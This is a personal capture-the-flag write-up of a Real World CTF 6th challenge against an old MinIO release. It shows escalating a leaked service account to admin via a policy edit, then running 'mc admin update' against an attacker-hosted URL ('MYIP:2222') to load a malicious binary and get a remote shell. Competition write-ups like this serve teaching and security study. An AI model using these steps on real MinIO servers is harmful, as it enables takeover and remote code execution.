I recently attended REAL WORLD CTF 6th.
I scored 24th of 2291 teams. I’m happy that I was able to solve the web chal which only 11 teams solved.
score bord (tairo, my alias)
extreme challenges, I like
Challenge
Old CVEs, try pwn it for fun.
Analysis
Attached file contains Dockerfile, data directory and run.sh which contains following lines.
#!/bin/bash
docker build -t minio/minio:RELEASE.2023-03-13T19-46-17Z.fips-rwctf .
docker run -e MINIO_UPDATE_MINISIGN_PUBKEY= -e MINIO_ROOT_USER=rwctf -e MINIO_ROOT_PASSWORD=rwctf123_for_player -d -p 9000:9000 -p 9090:9090 minio/minio:RELEASE.2023-03-13T19-46-17Z.fips-rwctf server /data --console-address ':9090'
I didn’t know any info about minio(https://min.io/), it seems some kind of s3 API implementation with Command Query pattern like, that has Enterprise Oriented Management Console.
When I started to considering Release Notes and detailed information for CVEs satisfiing version==RELEASE.2023-03-13T19-46-17Z.
Privilege Escalation on Linux/MacOS · Advisory · minio/minio · GitHub
An attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing PostPolicyBucket. To carry out this attack, the attacker requires credentials with arn:aws:s3:::* permission, as well as enabled Console API access.
Is it suits this situation ? I considered but routing logic forest couldn’t answer my question immediately. After spent some hours, I found interesting advisory referred to similar privilege escalation.
Denial of access by an admin privileged user for root credential · Advisory · minio/minio · GitHub – This fix patched with this version, but… similar notes still appears on newer releases. this is important point for getting the flag.
Rabbit Holes
I found well detailed exploit information. It is very helpful and works perfectly in the local enviroment. We know rwctf password MINIO_ROOT_PASSWORD=rwctf123_for_player. Even if changed this password, /minio/bootstrap/v1/verify approach can reveal all enviroment variables.
Howver, rwctf user’s password has changed on the remote machine, and /minio/bootstrap endpoint are restricted with something like ACL system .
I retried WAF bypass payloads many times, googled to get a more critical information about this point. All monkey works ended up wasted. I got stuck.
Flag
In the end, dump of service-account that saying never expire session placed in data/, and some reports about lack of checking iam logics helped me.
cred dumps on the replica files
And the manual(https://min.io/docs/minio/linux/reference/minio-mc.html) of official client(mc) were very useful.
However, service-account(Vmd6q3aw2eOEmZ6l) does not have permission to update the binaries required by the evil_minio technique.
So I tried the privilege escalation mentioned in the advisory. It went well !
exploit steps
- mc alias set test http://xxx:yyy # yyy is forwarded to console port
- mc admin user svcacct edit test Vmd6q3aw2eOEmZ6l –policy ./policy.json # wrote following json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"admin:*"
]
},
{
"Effect": "Allow",
"Action": [
"kms:*"
]
},
{
"Effect": "Allow",
"Action": [
"s3:*"
],
"Resource": [
"arn:aws:s3:::*"
]
}
]
}
aquiring arn:aws:s3::: and admin:*
policy granted
-
mc admin update test http://MYIP:2222/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y # about the line, detailed at here.
-
got a remote shell and the FLAG !!!
pwned
Outro
Reversing from this write-up, this challenge is not so hard, but I solved in last few houres (my submition is 11th, last). I felt that Mass of codes and limited time (this is one of the easiest challenge in this ctf), raised the bar. Fortunately, luck smiled on me and I was able to get out of the rabbit hole.
But I’m a little disappointed because I think I could have solved ChatterBox if I had more time if I didn’t got stuck…